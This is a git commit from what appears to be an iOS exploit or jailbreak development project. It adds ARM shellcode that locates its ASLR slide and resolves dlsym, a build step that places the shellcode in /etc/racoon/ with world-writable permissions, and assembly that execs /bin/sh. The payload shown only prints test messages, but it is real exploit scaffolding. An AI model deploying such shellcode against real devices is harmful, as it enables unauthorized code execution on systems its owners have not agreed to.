hell

author: spv420 <spv@spv.sh> 2022-07-30 23:32:19 -0400
committer: spv420 <spv@spv.sh> 2022-07-30 23:32:19 -0400
commit: 630aecdb5082b7aabf38c4d5594fb236bebcceff (patch)
tree: dd65f68e2d342a53bd4cfa59d0a8fcd149376be2 /tools
parent: e35a04268fb48fac634ca123a58584a26b513831 (diff)
5 files changed, 179 insertions, 14 deletions
diff --git a/tools/build_native.sh b/tools/build_native.sh
index 6edac97..2290017 100755
--- a/tools/build_native.sh
+++ b/tools/build_native.sh
@@ -20,10 +20,14 @@ gcc defines.c -o bin/defines --std=c99 -marm
 ldid -S bin/defines
 
 rm shc/bin/shellcode
-gcc shc/shellcode.c -o shc/bin/shellcode --std=c99 -marm -ffreestanding -c -fPIC
+gcc shc/shellcode.c -o shc/bin/shellcode.o --std=c99 -marm -ffreestanding  -fno-common -Os -fomit-frame-pointer -fPIC -c -static
 #ldid -S shc/bin/shellcode
 
-otool -t shc/bin/shellcode -X | cut -d " " -f 2- | tr -d "\n" | xxd -r -ps > shc/bin/shellcode.bin
+#otool -t shc/bin/shellcode -X | cut -d " " -f 2- | tr -d "\n" | xxd -r -ps > shc/bin/shellcode.bin
+
+objcopy -O binary shc/bin/shellcode.o shc/bin/shellcode.bin
+cp shc/bin/shellcode.bin /etc/racoon/
+chmod 777 /etc/racoon/shellcode.bin
 
 rm bin/jit_all_the_things
 gcc jit_all_the_things.c -o bin/jit_all_the_things --std=c99 -marm -fPIC
diff --git a/tools/defines.c b/tools/defines.c
index 4c499b3..44edc28 100644
--- a/tools/defines.c
+++ b/tools/defines.c
@@ -15,6 +15,9 @@ void fuck(char* s) {
 	printf("var %s_addr = 0x%08x;\n", s, dlsym_cf(s));
 }
 
+extern uint32_t bootstrap_port;
+
+
 int main(int argc, char* argv[]) {
 	printf("#define PRINTF_ADDR 0x%x\n", dlsym(RTLD_DEFAULT, "printf"));
 //	printf("%x %x %x %x %x %x %x %x\n", RTLD_NOW, dlsym_cf("kCFTypeDictionaryKeyCallBacks"), 0x41414141);//, &kCFTypeDictionaryValueCallBacks, kCFNumberSInt32Type);
@@ -24,5 +27,6 @@ int main(int argc, char* argv[]) {
 //	fuck("kCFNumberSInt32Type");
 	fuck("CFDictionarySetValue");
 	fuck("CFNumberCreate");
+	printf("%x %x %x %x %x\n", SEEK_SET, SEEK_CUR, SEEK_END, RTLD_DEFAULT, bootstrap_port);
 	return 0;
 }
diff --git a/tools/envrun.s b/tools/envrun.s
new file mode 100644
index 0000000..26752a4
--- /dev/null
+++ b/tools/envrun.s
@@ -0,0 +1,112 @@
+	.cstring
+	.align 2
+LC0:
+	.ascii "SHELL=/bin/sh\0"
+	.align 2
+LC1:
+	.ascii "USER=mobile\0"
+	.align 2
+LC2:
+	.ascii "HOME=/var/mobile\0"
+	.align 2
+LC3:
+	.ascii "XPC_FLAGS=0x0\0"
+	.align 2
+LC4:
+	.ascii "XPC_SERVICE_NAME=0\0"
+	.align 2
+LC5:
+	.ascii "LOGNAME=mobile\0"
+	.align 2
+LC6:
+	.ascii "PATH=/usr/bin:/bin:/usr/sbin:/sbin\0"
+	.align 2
+LC7:
+	.ascii "__CF_USER_TEXT_ENCODING=0x1F5:0:0\0"
+	.const_data
+	.align 2
+_C.2.2397:
+	.long	LC0
+	.long	LC1
+	.long	LC2
+	.long	LC3
+	.long	LC4
+	.long	LC5
+	.long	LC6
+	.long	LC7
+	.long	0
+	.cstring
+	.align 2
+LC8:
+	.ascii "/bin/sh\0"
+	.const_data
+	.align 2
+_C.1.2396:
+	.long	LC8
+	.long	0
+	.text
+	.align 2
+	.globl _main
+_main:
+	@ args = 0, pretend = 0, frame = 52
+	@ frame_needed = 1, uses_anonymous_args = 0
+	stmfd	sp!, {r4, r7, lr}
+	add	r7, sp, #4
+	sub	sp, sp, #52
+	str	r0, [sp, #4]
+	str	r1, [sp, #0]
+	ldr	r3, L7
+L2:
+	add	r3, pc, r3
+	ldmia	r3, {r3-r4}
+	str	r3, [sp, #44]
+	str	r4, [sp, #48]
+	ldr	r3, L7+4
+L3:
+	add	r3, pc, r3
+	add	lr, sp, #8
+	mov	ip, r3
+	ldmia	ip!, {r0, r1, r2, r3}
+	stmia	lr!, {r0, r1, r2, r3}
+	ldmia	ip!, {r0, r1, r2, r3}
+	stmia	lr!, {r0, r1, r2, r3}
+	ldr	r3, [ip, #0]
+	str	r3, [lr, #0]
+	add	ip, sp, #8
+	ldr	r3, L7+8
+L4:
+	add	r3, pc, r3
+	mov	r0, r3
+	ldr	r3, L7+12
+L5:
+	add	r3, pc, r3
+	mov	r1, r3
+	mov	r2, #0
+	mov	r3, ip
+	bl	L_execle$stub
+	mov	r3, #0
+	mov	r0, r3
+	sub	sp, r7, #4
+	ldmfd	sp!, {r4, r7, pc}
+	.p2align 2
+L8:
+	.align 2
+L7:
+	.long	_C.1.2396-8-(L2)
+	.long	_C.2.2397-8-(L3)
+	.long	LC8-8-(L4)
+	.long	LC8-8-(L5)
+	.section __TEXT,__picsymbolstub4,symbol_stubs,none,16
+	.align 2
+L_execle$stub:
+	.indirect_symbol _execle
+	ldr	ip, L_execle$slp
+L1$scv:	add	ip, pc, ip
+	ldr	pc, [ip, #0]
+L_execle$slp:
+	.long	L_execle$lazy_ptr - (L1$scv + 8)
+	.lazy_symbol_pointer
+L_execle$lazy_ptr:
+	.indirect_symbol	_execle
+	.long	dyld_stub_binding_helper
+	.subsections_via_symbols
diff --git a/tools/shc/shellcode.c b/tools/shc/shellcode.c
index 011b5cc..8c725a5 100644
--- a/tools/shc/shellcode.c
+++ b/tools/shc/shellcode.c
@@ -1,24 +1,65 @@
+#pragma optimize("", off)
+
 /*
  *  native C shellcode
  */
 
 typedef unsigned int uint32_t;
 
+#define MAX_SLIDE 0x3
+#define MIN_SLIDE 0x1
+#define UNSLID_BASE 0x4000
+#define RESERVE_ADDR 0x1a0000
+#define RTLD_DEFAULT 0xfffffffe
+#define LOG_SYSLOG 0x28
+
 //#define PRINTF_ADDR 0x2054a3b9
 //#define BASE_ADDR 0x42000000
 
+#define printf(...) do {	\
+	uint32_t _get_our_slide(void);	\
+	uint32_t (*__get_our_slide)(void) = &_get_our_slide;	\
+	uint32_t __slid_base = 0x4000 + (__get_our_slide() << 12);	\
+	uint32_t __shc_slide = *(uint32_t*)(RESERVE_ADDR + __slid_base - 0x4000 + 20);	\
+	uint32_t __dlsym_addy = *(uint32_t*)(RESERVE_ADDR + __slid_base - 0x4000 + 24);	\
+	void* (*__dlsym)(void* handle, const char* symbol) = __dlsym_addy + __shc_slide;	\
+	int (*__printf)(char* s, ...) = (int (*)(char*, ...))__dlsym(RTLD_DEFAULT, "printf");	\
+	__printf(__VA_ARGS__);	\
+} while (0)
+
+#define syslog(...) do {	\
+	uint32_t _get_our_slide(void);	\
+	uint32_t (*__get_our_slide)(void) = &_get_our_slide;	\
+	uint32_t __slid_base = 0x4000 + (__get_our_slide() << 12);	\
+	uint32_t __shc_slide = *(uint32_t*)(RESERVE_ADDR + __slid_base - 0x4000 + 20);	\
+	uint32_t __dlsym_addy = *(uint32_t*)(RESERVE_ADDR + __slid_base - 0x4000 + 24);	\
+	void* (*__dlsym)(void* handle, const char* symbol) = __dlsym_addy + __shc_slide;	\
+	void (*__syslog)(int, char* s) = (void (*)(int, char*))__dlsym(RTLD_DEFAULT, "syslog");	\
+	__syslog(__VA_ARGS__);	\
+} while (0)
+
 void entry(void) {
-	*(uint32_t*)0x69696969 = (uint32_t)0x1;
-	/*
-	uint32_t dlsym_addr = *(uint32_t*)BASE_ADDR;
-	void* (*dlsym)(void* handle, char* s) = (void* (*)(void*, char*))dlsym_addr;
-	void (*abort)(void) = dlsym(0xfffffffe, "abort");
-	abort();*/
+	int i = 0;
+	uint32_t _get_our_slide(void);
+	uint32_t (*get_our_slide)(void) = &_get_our_slide;
+	while (i < 0x100) {
+		__asm__ volatile("nop");
+		i++;
+	}
+	printf("we out here\n");
+	printf("gos=%x %x\n", get_our_slide, &i);
+	printf("hello from native C, i=%d, slide = 0x%x\n", i, get_our_slide());
+	syslog(LOG_SYSLOG, "we out here in native C");
+	*(uint32_t*)0x41414141 = i;
 }
 
-/*
-void shellcode_main(void) {
-	uint32_t puts_addr = *(uint32_t*)BASE_ADDR;
-	int (*puts)(char* s) = (int (*)(char* s))puts_addr;
-	puts("Hello from shellcode!\n");
-}*/
-\ No newline at end of file
+uint32_t _get_our_slide(void) {
+	uint32_t slide = MAX_SLIDE;
+//	int (*printf)(char* s, ...) = 0x24da63b9;
+//	printf("second function\n");
+	for (slide = MAX_SLIDE; slide >= MIN_SLIDE; slide--) {
+		if (*(uint32_t*)(UNSLID_BASE + (slide << 12)) == 0xfeedface) {
+			return slide;
+		}
+	}
+}
+\ No newline at end of file
diff --git a/tools/testlol.c b/tools/testlol.c
index fa0c1d9..62dd465 100755
--- a/tools/testlol.c
+++ b/tools/testlol.c
@@ -2,6 +2,7 @@
 #include <sys/mman.h>
 #include <stddef.h>
 #include <stdio.h>
+#include <dlfcn.h>
 //#include <IOKit/IOKitLib.h>
 //#include <IOKit/iokitmig.h>
 
@@ -122,6 +123,9 @@ struct test {
 };
 
 int main(int argc, char* argv[]) {
+    printf("%x\n", dlopen("/System/Library/PrivateFrameworks/GameCenter.framework/GameCenter", RTLD_NOW));
+    return;
+
 #if 0
     struct test d;
     d.a = 1;
author	spv420 <spv@spv.sh>	2022-07-30 23:32:19 -0400
committer	spv420 <spv@spv.sh>	2022-07-30 23:32:19 -0400
commit	630aecdb5082b7aabf38c4d5594fb236bebcceff (patch)
tree	dd65f68e2d342a53bd4cfa59d0a8fcd149376be2 /tools
parent	e35a04268fb48fac634ca123a58584a26b513831 (diff)